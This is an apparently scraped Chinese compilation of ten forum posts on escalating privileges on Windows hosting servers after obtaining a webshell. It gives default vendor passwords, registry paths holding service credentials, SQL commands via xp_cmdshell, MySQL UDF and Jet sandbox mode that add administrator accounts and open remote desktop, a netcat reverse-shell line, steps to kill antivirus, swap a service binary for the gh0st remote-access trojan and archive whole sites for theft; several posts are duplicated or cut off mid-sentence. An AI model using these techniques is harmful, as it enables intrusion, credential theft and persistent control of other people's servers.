【导语】“一个快乐的人”通过精心收集,向本站投稿了10篇主机提权方法经验,以下是小编收集整理后的主机提权方法经验,仅供参考,欢迎大家阅读。
- 目录
篇1:主机提权方法经验
zkeys 默认网站用户权限很低,大部分exp都用不了,如 iis6 exp 就提示无法设置注册表,
提供我成功过的几个方法(不一定有效):
1、如果目标仅仅是旁站的话可以去注册表查 serv-u 的指定用户密码,注册表地址:HKEY_LOCAL_MACHINE\\SOFTWARE\\cat soft\\serv-u\\
2、如果要提权的话可以找找有 winwebmail 没,这个东西有的 zkeys 装了,有的没装,如果找到这东西直接去他目录写个 shell,权限就比之前大了,exp 也能提了。
我碰到的几个都是在 d:\\winwebmail\\web\\ 只要有这东西就好办,可以写 lpk,或者替换里面的 exe 啥的都行。
3、如果有 serv-u 的管理密码的话可以用 serv-u 来提权, 虽然 zkeys 的 serv-u 也不是管理权限,但是执行 exp 足以了。
4、找各种软件可写目录放 lpk,此方法在 zkeys 下我也成功过两次。
5、最后一个方法,2003溢出 我直接以默认权限执行成功过一次,
西部数码虚拟主机提权思路
西部数码虚拟主机安装后默认s-u的LocalAdministrator用户密码为root3306
就算修改了也是可以读取ini文件得到加密密码的
mysql 的root密码在安装过程中会提示是否修改 默认也是为root3306 或者 123456
在这些服务安装的过程中西部数码给这些服务都是低权限运行的。所以无法使用一些webshell集成的s-u EXP来提权
这里我写了一个脚本专门针对这种虚拟主机提权用的! ^_^`
值得一说的是在该虚拟主机并未删除Wscript.Shell组建。不过很杯具的是我没有找到执行目录.
所以我才整出了这个东西出来嘿嘿。
该虚拟主机默认软件安装路径:d:\\SOFT_PHP_PACKAGE\\ 在该目录下setup.ini配置文件中记录着mysql root 密码 site.xml 记录着网站配置信息(3.0以前的版本)
3.0版本现在集成到了access数据库中 也是存放在 默认安装路径下的iistool.dat 文件中 用户权限也是 users组可读 这样我们就可以利用webshell获取到各种信息了哈哈(这个其实是一个access数据库文件 他的连接密码为:www@west263@cn )
篇2:迅雷提权方法
Kindle‘s blog
当我们使用迅雷下载东西的时候,会调用我们安装迅雷后一个htm文件,去激活htm文件里的一些代码,
把我们所下载东西添加到列表当中,
所对应的htm文件有2处一处是C:\\Program Files\\Thunder Network\\Thunder\\Program\\geturl.htm
一处是C:\\Program Files\\Thunder Network\\Thunder\\Program\\getAllurl.htm
如果我们想把我们想要的代码添加进去执行了?
我们简单写个代码试试,代码如下:
应该大家都可以看的出,如果我们把这段代码添加到那2个htm文件里,当迅雷下载东西的时候,一样
会去执行我们的代码,
添加一个administrators组的一个用户kindle
当然,代码大家可以自定义的..
测试通过,迅雷版本为5.9.2.927
篇3: 常用的提权方法归总
1.radmin连接法 条件是你权限够大,对方连防火墙也没有,
常用的提权方法归总
,
封装个radmin上去,运行,开对方端口,然后radmin上去。本人从来没成功过,端口到是给对方打开了。 2.paanywhere C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\ 这里下
篇4:提权的一种方法
有时候拿到一SHELL是SA权限,但是内网。我们直接想到用LCX转发端口那假如LCX被杀了之后你会怎么办呢当然很多人就会想到用远控。。。因为我没玩过远控和其他的病毒所以就想到了以下的办法 第一导出注册表的启动项。修改里面杀毒的路径。
有时候拿到一SHELL是SA权限。
但是内网。我们直接想到用LCX转发端口
那假如LCX被杀了之后你会怎么办呢
当然很多人就会想到用远控,
。。因为我没玩过远控和其他的病毒所以就想到了以下的办法
第一导出注册表的启动项。修改里面杀毒的路径。在导入注册表 。重启机子后杀软也就不会启动了
第二如果不能修改注册表的启动项。就种个反弹SHELL上去。用SA反弹回来。这样我就得到了一个ADMIN的CMDshell了。找到杀软的路径用del /f /s /q . 删出里面所以的程序。重启机子后杀软还能重启吗?
在传个LCX上去杀软就不会动了撒
当然你可以用NET STOP来停止杀软。
同样即使不是SA的权限。导出注册表的启动项也可以知道哪些是启动的。这样一样为提权的扩大了一定的空间
篇5:什么是提权(提权的方法)
只要给我一个注射点,无论什么权限,我都给你一个webshell甚至系统权限 声明:本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责,
什么是万能提权(万能提权的方法)
,
因为发觉其危害过大,原文已经经过大量删减及修改,即使这样本文的危害性仍然很大,所以请大家不要对国内的站点做
篇6:服务器提权的各种方法小结
查找配置文件 ,翻阅网站目录下的 config.asp config.php conn.asp inc目录查找 具有高权限的账号和密码
比如说: root 密码 SA的密码,
// [CH] 以下变量请根据空间商提供的账号参数修改,如有疑问,请联系服务器提供商
$dbhost = 'localhost';
// 数据库服务器
$dbuser = 'root';
// 数据库用户名
$dbpw = '123';
// 数据库密码
$dbname = 'discuz';
// 数据库名
$pconnect = 0;
// 数据库持久连接 0=关闭, 1=打
得到root 帐户密码:
root
123
利用MySQL root 提权
DLL已成功的导出到c:\\\\windows\\\\system32\\\\mysqlDll_1269695183.dll
Function 'state' already exists
select state(“net user yhsafe yhsafe /add”)
SQL语句成功执行:Resource id #2
Array
(
[0] =>命令成功完成。
succeed!
[state(“net user yhsafe yhsafe /add”)] =>命令成功完成。
succeed!
)
利用 SA来提权
server=localhost;UID=saWD=123;database=masterrovider=SQLOLEDB
执行xp_cmdshell 假如没有,记得先恢复xp_cmdshell
Exec master.dbo.xp_cmdshell 'net user yhsafe.com yhsafe /add'
Exec master.dbo.xp_cmdshell 'net localgroup administrators yhsafe.com /add'
开启3389:
Exec master.dbo.xp_cmdshell 'C:\\inetpub\\wwwroot\\bbs\\3389.exe 3389'
返回结果:
Now opening terminate service...success!
5.2
OK...
开启成功
2.利用一些软件配置漏洞,或者本地溢出来进行提权,
“巴西烤肉”提权:
webshell下执行 ch.exe “net user 123 123 /add”
360提权:
360.exe 3389 //这样的话就开启了远程桌面
按5下shift 就出弹出CMD
3.替换服务法
C:\\ftp\\FtpServer.exe
对FtpServer.exe 重命名为 FtpServer1.exe
上传一个反弹的远程控制程序。比方 gh0st
gh0st 重命名为FtpServer.exe
4.打破常规用webshell来进行Sniffer
能Sniffer到整个服务器的FTP HTTP这类密码。
需要用到Wireshark 专业工具来查看密码。
5.dump 密码
dump 需要administrator 甚至 system权限
dump出hash 进而对内网进一步渗透
篇7:RING的多种提权方法
1.radmin连接法 条件是你权限够大,对方连防火墙也没有,
RING的多种提权方法
,
封装个radmin上去,运行,开对方端口,然后radmin上去。本人从来米成功过。,端口到是给对方打开了。 2.pcanywhere C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\ 这里
篇8:谈对星外主机提权利用网站安全
T00LS上最近段时间谈了比较多星外提权的方法,最近刚好碰到了站结合些大牛的思路写个过程!目标是钓鱼站很是讨厌,没0DAY 程序也很安全,旁注拿到了SHELL.测试支持ASPX脚本!上传了个BIN免杀ASPX大马 其他结果大家也知道了,目标跨不过去,MYSQL等目录跳不过去,CMD和其它提权工具上传执行显示空白或者提示无权限!RegShell读注册表没发现多少利用的东西,但是根据些信息知道是星外
对新手来说在这里很容易陷入困境!
星外sa密码注册表位置:HKEY_LOCAL_MACHINE\\SYSTEM\\LIWEIWENSOFT\\INSTALLFREEADMIN\\11 32位MD5加密很多情况下MD5跑不出有高人找到了个可写可执行目录C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\Media Index\\ cmd.exe上传在这里可以执行些简单的命令如: set,systeminfo,ipconfig,ping,等~利用这些命令可以收到比较多的系统信息.
如果你比较幸运管理配置不当的话还可以DIR C.D.E等其他盘,很久以前小K(khjl1)给我发了个for命令利用,for命令比dir执行权限要小 类似dir的功能 大家可以在不能dir的情况下试下
for /r d:\\freehost\\ %i in (test) do @echo %i >>C:\\路径\\1.txt 把d:\\freehost\\所有文件写入1.txt在用VBS读IIS密码时候很多提到NC反弹,其实不需要 很多情况下NC根本反弹不了,防火墙都挡住了.成功率很底, 如果你失败了而非得继续NC的话可以试下这个兄弟的,大家或许可以根据这个方法测试下。反弹cmdshell:
“c:\\windows\\temp\\nc.exe -vv ip 999 -e c:\\windows\\temp\\cmd.exe”
通常都不会成功,
而直接在 cmd路径上 输入 c:\\windows\\temp\\nc.exe
命令输入 -vv ip 999 -e c:\\windows\\temp\\cmd.exe
却能成功。。
******我是没成功,呵呵******
systeminfo看了下管理把补丁打得很齐全用VBS提权测试 这里我们可以把iis.vbs上传到WEB跟目录下而不必传到Media Index目录但是提权工具必须传到Media Index才有权限执行切记~ C:\\Documents and Settings\\下有空格所以得用“”包含 如:
CmdPath:
C:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\Media Index\\cmd.exe
Argument:
/c “c:\\Documents and Settings\\All Users\\Application Data\\Microsoft\\Media Index\\cscript.exe” d:\\freehost\\web\\1.vbs
不包含的话会提示失败,所以细节决定成败!
iis.vbs列出了所有域名和路径当然也包括我们的目标站,试下用TYPE命令目标数据配置信息(提权下可以读些MSSQL或MYSQL的WEB配置等~~~信息方便提权)我这里只针对目标,这里库是ACCESS的 再结合手上的几个VBS读IIS用户和密码 用读出的密码21端口可以连接 收工!
经常有人问我要免杀LCX,其实如果支持ASPX的话上面有个PortMap功能很多人没注意还是什么的,这个类似LCX做转发,在支持ASPX的站上就别传什么LCX了.免杀还麻烦以上根据别人和自己经验整理,其实也很简单的,方便些新手学习 如有不足请提醒
篇9:winrar之rar.exe提权方法一测
漏洞添加:sitedir
得到了Webshell后,最好自己传一个rar.exe,虽然program files目录有,但是有时执行不了,rar.exe体积200K,呵呵!将就下。在CMDSHELL执行:D:\\1\\Rar.exe a -k -r -s -m1 E:\\web\\1.rar E:\\web\\。我来介绍下吧,“D:\\1\\rar.exe”是你上传的rar.exe,后面参数我会给大家放在下面;“E:\\web\\1.rar”是你压缩的文件存放的位置(在shell中一定要选能写的目录);“E:\\web\\”是你要打包的目录。
很简单吧?以后在没有得到服务器,大家可以尝试我介绍的方法,下载整站源码.
rar.exe参数:
a 添加文件到压缩文件中
-k 锁定压缩文件
-s产生固体存档,这样可以增大压缩比
-r包括子目录
-m1 设置压缩比
-m0 存储 添加到压缩文件时不压缩文件,
-m1 最快 使用最快方式(低压缩)
-m2 较快 使用快速压缩方式
-m3 标准 使用标准(默认)压缩方式
-m4 较好 使用较好压缩方式(较好压缩,但是慢)
-m5 最好 使用最大压缩方式(最好的压缩,但是最慢)Sample Text
篇10:SA权限沙盘模式提权方法
方便自己记忆再写出来,在这种情况下,要执行命令,条件是要有xp_regwrite,
首先开启沙盘模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\\ Microsoft\\Jet\\4.0\\Engines','SandBoxMode','REG_DWORD',1
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\\windows\\system32\\ias\\ias.mdb','select shell(“cmd.exe /c net user cnfjhh fst /add”)')
★ 高考百日提分经验
主机提权方法经验(精选10篇)
